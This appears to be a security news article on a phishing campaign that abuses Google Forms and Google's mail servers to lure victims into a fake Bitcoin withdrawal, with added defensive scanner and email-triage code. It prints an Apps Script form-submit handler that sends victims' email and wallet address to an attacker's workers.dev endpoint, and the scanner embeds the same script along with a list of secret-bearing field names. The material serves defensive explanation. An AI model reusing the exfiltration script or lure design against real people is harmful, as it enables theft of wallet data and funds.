Google Forms is a popular survey tool because it is free and easy to use, and attackers are now abusing the platform's reputation to run large-scale cryptocurrency fraud campaigns. Using social engineering, they steal wallet details and drain victims' funds.


A sophisticated phishing campaign that impersonates a trading platform

The campaign was first spotted in late 2024 but only took off in the second quarter of 2025. It begins with an unexpected email containing a forms.gle link; the link looks legitimate and slips past most spam filters. When victims open it, they land on a Google Form that impersonates a well-known cryptocurrency exchange and claims that a payment of 1,275 BTC is pending.

If the user follows the instructions, they are sent on to a fake withdrawal gateway that asks them to confirm their wallet address and pay a small "network fee". The submitted data is forwarded immediately to a command-and-control (C2) server hidden behind Cloudflare Workers, and the fee goes straight to a mixer wallet, which obscures the trail of the transaction.

Leveraging Google infrastructure to bypass mail filters

One factor behind the campaign's unusually high success rate is that it uses Google's own infrastructure to deliver the email. The lure messages are sent by Google's own SMTP servers from the google.com domain, so they pass SPF, DKIM, and DMARC checks. Most spam filters and domain-reputation systems therefore treat them as legitimate and deliver them straight to the inbox instead of flagging them or routing them to spam. The checks themselves are not wrong: SPF, DKIM, and DMARC only prove that google.com really sent the message; they say nothing about what the form it links to does.

Beyond defeating technical filtering, the campaign exploits users' existing trust in Google. A forms.gle link looks familiar and is generally rated benign by URL scanners, so it gets clicked without suspicion.

According to Kaspersky, Google Forms-based phishing attacks rose 63% in July 2025 compared with the average of the preceding months, and experts rated the campaign one of the most effective social engineering scams of the year. It uses no malware and exploits no complex vulnerability; the abuse of legitimate tools and trusted domain reputation alone is enough to get past traditional protections.

Attack mechanism: harvesting data via a webhook and malicious JavaScript

A key part of the data-theft process is the script attached to the Google Form. The attackers use an Apps Script form-submit trigger, a legitimate Google Workspace feature, to forward data to a webhook the moment the user clicks "Submit". That seemingly harmless click sends the victim's wallet address and email to a C2 server hidden behind Cloudflare Workers.

The form also embeds a JavaScript redirect that automatically sends the browser on to a fake site at hxxps://claim-btc-id[.]online. The site is a carefully built clone with a polished React front end, which makes it look professional, and a Flask backend acting as a proxy: every interaction there is relayed in the background to the attacker's server.

A leaked script from one of the forms shows how the data is harvested immediately after submission:

Code:
// Runs on the form-submit trigger; e.namedValues holds the submitted answers keyed by question title
function onFormSubmit(e){
  const payload = JSON.stringify({
    email: e.namedValues['Email'][0],
    wallet: e.namedValues['Wallet Address'][0]
  });
  // Forwards the harvested values to the attacker's Cloudflare Workers endpoint
  UrlFetchApp.fetch('https://worker-cryptodrip.workers.dev/submit', {
    method: 'post',
    contentType: 'application/json',
    payload: payload
  });
}

Inside the Google Forms environment this script looks legitimate, but it is in fact a mechanism for shipping data straight to the attacker's control system, with no warning or visible sign in the user interface. Combined with the promise of a "BTC reward", the campaign preys on greed and inattention, and victims lose money after a few clicks.
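
The scanner below is an added example, not code from the article, Google, or Kaspersky. It audits Apps Script source for the pattern described above: an onFormSubmit trigger that reads submitted answers out of e.namedValues and forwards them with UrlFetchApp to a host outside an allowlist, rating workers.dev destinations (the C2 cover named in the article) higher. The leaked script is the one quoted above with its typos corrected; the allowlist, the sensitive-field names and the benign second script are assumptions made for this example.

```python
"""Audit Apps Script source for form-submit exfiltration (added example)."""
import re
from urllib.parse import urlparse

# Assumed allowlist: hosts the organisation's own scripts are expected to call.
ALLOWED_HOSTS = {"hooks.example.com"}
# Hosting the article names as C2 cover; treated as higher severity here.
SUSPICIOUS_SUFFIXES = (".workers.dev",)
# Assumed substrings marking answers that should never leave the tenant.
SENSITIVE_FIELDS = ("wallet", "email", "seed", "private key", "password")

FETCH_RE = re.compile(r"UrlFetchApp\.fetch\s*\(\s*['\"]([^'\"]+)['\"]", re.IGNORECASE)
TRIGGER_RE = re.compile(r"function\s+onFormSubmit\s*\(")
FIELD_RE = re.compile(r"namedValues\s*\[\s*['\"]([^'\"]+)['\"]\s*\]")

# The script quoted in the article, typos corrected.
LEAKED_SCRIPT = """\
function onFormSubmit(e){
  const payload = JSON.stringify({
    email: e.namedValues['Email'][0],
    wallet: e.namedValues['Wallet Address'][0]
  });
  UrlFetchApp.fetch('https://worker-cryptodrip.workers.dev/submit', {
    method: 'post',
    contentType: 'application/json',
    payload: payload
  });
}
"""

# Constructed benign script: posts only a count to an allowlisted internal webhook.
BENIGN_SCRIPT = """\
function onFormSubmit(e){
  UrlFetchApp.fetch('https://hooks.example.com/forms', {
    method: 'post',
    payload: JSON.stringify({ answers: e.namedValues['Feedback'].length })
  });
}
"""


def audit(source: str, allowed_hosts=ALLOWED_HOSTS) -> list:
    """Return one finding per UrlFetchApp.fetch call to a non-allowlisted host."""
    findings = []
    has_trigger = bool(TRIGGER_RE.search(source))
    fields = FIELD_RE.findall(source)
    sensitive = [f for f in fields if any(s in f.lower() for s in SENSITIVE_FIELDS)]
    for m in FETCH_RE.finditer(source):
        url = m.group(1)
        host = (urlparse(url).hostname or "").lower()
        if host in allowed_hosts:
            continue
        severity = "high" if host.endswith(SUSPICIOUS_SUFFIXES) else "medium"
        if has_trigger and sensitive:
            # Submitted wallet/email answers leave the tenant on every submit.
            severity = "critical"
        findings.append({
            "line": source.count("\n", 0, m.start()) + 1,
            "url": url,
            "host": host,
            "severity": severity,
            "sensitive_fields": sensitive if has_trigger else [],
        })
    return findings


if __name__ == "__main__":
    for finding in audit(LEAKED_SCRIPT):
        print(finding)
    print("benign script findings:", audit(BENIGN_SCRIPT))
```

Run it over the .gs files exported from a Workspace tenant (or the project source pulled with clasp) and review every critical finding by hand; a fetch to an unknown host is only suspicious, but a form-submit trigger that reads wallet or email answers and posts them to workers.dev is exactly the leak described above.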

Preventive measures

Given the growing abuse of Google Forms in fraud campaigns, Kaspersky recommends that organizations deploy a multi-layered defense, including:

  • Set up an email content-control policy for messages containing Google Forms links, quarantining them by default unless the sender has been explicitly allowlisted and authenticated
  • Deploy a secure browser extension that can block outbound requests to unknown domains on the Cloudflare Workers platform, which attackers commonly use to hide C2 servers (legitimate services also run on workers.dev, so expect to tune the allowlist)
  • Give staff security awareness training that stresses basic principles such as "nobody hands out free cryptocurrency through an online form"
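
The triage routine below is an added example, not code from the article, Google, or Kaspersky. It ties together the point made earlier about Google's SMTP servers and the first recommendation above: a passing SPF/DKIM/DMARC result from google.com is not a safety signal (the verdicts only prove which domain sent the message), so a message carrying a forms.gle link is quarantined unless its sender is on an allowlist. The sample message, its sender address, subject and link token are constructed for this example; the article only states that the mail comes from the google.com domain, and the allowlist is an assumption.

```python
"""Triage an e-mail carrying a Google Forms link (added example)."""
import re
from email import message_from_string
from email.message import Message
from email.utils import parseaddr
from urllib.parse import urlparse

# Hostnames Google uses for form links; forms.gle is the short-link domain.
FORM_HOSTS = {"forms.gle", "docs.google.com"}

# Assumed allowlist of senders whose forms the organisation expects to receive.
ALLOWED_FORM_SENDERS = {"surveys@example.com"}

URL_RE = re.compile(r"https?://[^\s<>\"']+", re.IGNORECASE)

# Constructed sample: authentication passes for google.com, the lure is in the body.
SAMPLE_EMAIL = """\
From: Google Forms <forms-receipts-noreply@google.com>
To: victim@example.com
Subject: Your pending withdrawal of 1,275 BTC
Authentication-Results: mx.example.com;
       spf=pass smtp.mailfrom=google.com;
       dkim=pass header.d=google.com;
       dmarc=pass header.from=google.com
Content-Type: text/plain; charset="utf-8"

Your payout is waiting. Confirm your wallet address here:
https://forms.gle/AbCdEfGh123
"""


def auth_results(msg: Message) -> dict:
    """Extract the spf/dkim/dmarc verdicts from the Authentication-Results header."""
    header = msg.get("Authentication-Results", "")
    verdicts = {}
    for mech in ("spf", "dkim", "dmarc"):
        m = re.search(rf"\b{mech}=(\w+)", header)
        verdicts[mech] = m.group(1) if m else "none"
    return verdicts


def body_text(msg: Message) -> str:
    """Concatenate the text/plain parts of the message."""
    chunks = []
    for part in msg.walk():
        if part.get_content_type() == "text/plain":
            raw = part.get_payload(decode=True) or b""
            chunks.append(raw.decode(part.get_content_charset() or "utf-8", "replace"))
    return "\n".join(chunks)


def form_links(text: str) -> list:
    """Return the URLs in text whose host is a Google Forms host."""
    return [u for u in URL_RE.findall(text)
            if (urlparse(u).hostname or "").lower() in FORM_HOSTS]


def triage(raw_message: str) -> dict:
    """Quarantine forms links from non-allowlisted senders, whatever the auth verdicts say."""
    msg = message_from_string(raw_message)
    auth = auth_results(msg)
    sender = parseaddr(msg.get("From", ""))[1].lower()
    links = form_links(body_text(msg))
    authenticated = all(v == "pass" for v in auth.values())
    if links and sender not in ALLOWED_FORM_SENDERS:
        verdict, reason = "quarantine", "forms link from non-allowlisted sender"
    elif links:
        verdict, reason = "deliver", "forms link from allowlisted sender"
    else:
        verdict, reason = "deliver", "no forms link"
    return {"sender": sender, "authenticated": authenticated, "auth": auth,
            "form_links": links, "verdict": verdict, "reason": reason}


if __name__ == "__main__":
    print(triage(SAMPLE_EMAIL))
```

The sample message is fully authenticated and still ends up in quarantine: the decision is driven by the sender allowlist and the presence of a forms link, not by the SPF/DKIM/DMARC verdicts, which a mail gateway would otherwise use as its main reason to deliver.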

The campaign shows how serious the risk becomes when legitimate platforms are misused, turning mainstream tools into sophisticated channels for fraud. It also confirms that social engineering remains one of cybercrime's deadliest weapons: with no advanced technology and no attack on infrastructure, only a convincing forgery and a compelling promise, the attacker gets users to hand over their digital assets voluntarily in a matter of a few clicks.

Cyber Security News